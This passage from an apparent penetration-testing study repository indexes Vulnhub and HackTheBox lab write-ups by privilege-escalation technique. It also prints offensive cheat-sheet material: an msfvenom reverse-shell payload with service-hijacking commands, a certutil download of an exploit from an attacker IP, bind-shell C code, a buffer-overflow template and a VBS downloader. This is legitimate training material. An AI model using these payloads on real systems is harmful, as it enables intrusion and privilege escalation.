(#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_nfs_norootsquash"></a> #### privesc_nfs_norootsquash [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | --- <a name="privesc_nmap"></a> #### privesc_nmap [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 2. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | --- <a name="privesc_passwd_writable"></a> #### privesc_passwd_writable [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | --- <a name="privesc_psexec_login"></a> #### privesc_psexec_login [⇡](#privesc) If credentials for an administrative user are available, we can use `psexec.py` to connect and gain elevated access to the target system. ```shell psexec <username>@<targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="privesc_setuid"></a> #### privesc_setuid [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 2. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 3. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 4. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 5. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 6. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="privesc_shell_escape"></a> #### privesc_shell_escape [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_ssh_authorizedkeys"></a> #### privesc_ssh_authorizedkeys [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | --- <a name="privesc_ssh_knownhosts"></a> #### privesc_ssh_knownhosts [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Moria: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf) | [vh#187](https://www.vulnhub.com/entry/moria-11,187/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png" width="100" height="100" /> | [`privesc_ssh_knownhosts`](https://github.com/7h3rAm/writeups#privesc_ssh_knownhosts) | --- <a name="privesc_strace_setuid"></a> #### privesc_strace_setuid [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | --- <a name="privesc_sudo"></a> #### privesc_sudo [⇡](#privesc) using `sudo` to execute programs that run with elevated privileges | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 3. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 4. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 5. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 6. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="privesc_sudoers"></a> #### privesc_sudoers [⇡](#privesc) being able to edit the `/etc/sudoers` file to give a user elevated privileges | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 2. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf) | [htb#108](https://app.hackthebox.eu/machines/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100" /> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 3. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf) | [htb#64](https://app.hackthebox.eu/machines/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100" /> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 4. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | | 5. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 6. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 7. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="privesc_tmux_rootsession"></a> #### privesc_tmux_rootsession [⇡](#privesc) --- <a name="privesc_windows_ms10_059"></a> #### privesc_windows_ms10_059 [⇡](#privesc) ```shell wget https://github.com/abatchy17/WindowsExploits/raw/master/MS10-059%20-%20Chimichurri/MS10-059.exe sharehttp <targetport> certutil.exe -urlcache -split -f "http://<attackerip>:<targetport>/MS10-059.exe" pe.exe nc -nlvp 444 pe.exe <attackerip> 444 ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 [+] https://github.com/abatchy17/WindowsExploits/tree/master/MS10-059%20-%20Chimichurri --- <a name="privesc_windows_ms11_046"></a> #### privesc_windows_ms11_046 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | --- <a name="privesc_windows_ms14_070"></a> #### privesc_windows_ms14_070 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf) | [htb#13](https://app.hackthebox.eu/machines/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) | --- <a name="privesc_windows_ms15_051"></a> #### privesc_windows_ms15_051 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf) | [htb#14](https://app.hackthebox.eu/machines/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) | --- <a name="privesc_windows_ms16_032"></a> #### privesc_windows_ms16_032 [⇡](#privesc) --- <a name="privesc_windows_ms16_098"></a> #### privesc_windows_ms16_098 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf) | [htb#6](https://app.hackthebox.eu/machines/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100" /> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | --- <a name="privesc_windows_upnphost"></a> #### privesc_windows_upnphost [⇡](#privesc) On a Windows XP system, we can modify the insecurely configured `upnphost` service to gain elevated privileges. This can be done by creating a reverse shell binary and getting it executed by restarting the vulnerable service. ```shell msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -a x86 --platform windows -f exe -o pe.exe # upload pe.exe file to the target system sudo nc -nlvp <attackerport> sc config upnphost binpath= "C:\Inetpub\wwwroot\pe.exe" sc qc upnphost sc config upnphost obj= ".\LocalSystem" password= "" sc config SSDPSRV start= auto net start SSDPSRV net start upnphost ``` [+] https://www.hackingdream.net/2020/03/windows-privilege-escalation-cheatsheet-for-oscp.html --- <a name="tips"></a> ## ⚡ Tips [↟](#contents) ### bind shell [🡑](#tips) ``` bs.c #include <sys/socket.h> #include <netinet/in.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char* argv[]) { int host_sock = socket(AF_INET, SOCK_STREAM, 0); struct sockaddr_in host_addr; host_addr.sin_family = AF_INET; host_addr.sin_port = htons(atoi(argv[1])); host_addr.sin_addr.s_addr = INADDR_ANY; bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr)); listen(host_sock, 0); int client_sock = accept(host_sock, NULL, NULL); dup2(client_sock, 0); dup2(client_sock, 1); dup2(client_sock, 2); execve("/bin/bash", NULL, NULL); } gcc -m32 -o bs bs.c ./bs 4444 ``` ### buffer overflow [🡑](#tips) ``` payload = "\x41" * <length> + <ret_address> + "\x90" * 16 + <shellcode> + "\x43" * <remaining_length> pattern create: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <attackerport> pattern offset: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <attackerport> -q <address> nasm: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb nasm > jmp eax bad characters: badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") find address for "jmp esp" using mona.py: !mona jmp -r esp -b <list of bad chars> gcc compilation options: linux: gcc -m32 -Wl,--hash-style=both 9542.c -o 9542 -wl,--hash-style=both: linker option to enable both gnu and sysv style hashtable support references: https://github.com/s0wr0b1ndef/OSCP-note/blob/master/Buffer_overflow/info.txt https://github.com/justinsteven/dostackbufferoverflowgood/blob/master/dostackbufferoverflowgood_tutorial.md ``` ### file transfers [🡑](#tips) ``` certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/PSTools.zip" pstools.zip powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<targetip>/file.exe','C:\Users\user\Desktop\file.exe')" python3 -m pyftpdlib -p 21 rdesktop <targetip> -r disk:remotedisk=/usr/share/windows-binaries gzip+xxd: sender: gzip -c < file > file.gz xxd -p file.gz | tr -d '\n' && echo receiver: echo 1f8b...0000 > /tmp/file.gz.hex xxd -p -r < /tmp/file.gz.hex > /tmp/file.gz gunzip -c < /tmp/file.gz > /tmp/file automate file download via windows ftp client: echo open <targetip> >ftp_commands.txt echo anonymous >>ftp_commands.txt echo whatever >>ftp_commands.txt echo binary >>ftp_commands.txt echo get met8888.exe >>ftp_commands.txt echo bye >>ftp_commands.txt ftp -s:ftp_commands.txt create wget.vbs and download netcat: >C:\Windows\d.vbs echo strUrl = WScript.Arguments.Item(0) >>C:\Windows\d.vbs echo StrFile = WScript.Arguments.Item(1) >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >>C:\Windows\d.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >>C:\Windows\d.vbs echo Err.Clear >>C:\Windows\d.vbs echo Set http = Nothing >>C:\Windows\d.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >>C:\Windows\d.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >>C:\Windows\d.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >>C:\Windows\d.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >>C:\Windows\d.vbs echo http.Open "GET", strURL, False >>C:\Windows\d.vbs echo http.Send >>C:\Windows\d.vbs echo varByteArray = http.ResponseBody >>C:\Windows\d.vbs echo Set http = Nothing >>C:\Windows\d.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >>C:\Windows\d.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >>C:\Windows\d.vbs echo strData = "" >>C:\Windows\d.vbs echo strBuffer = "" 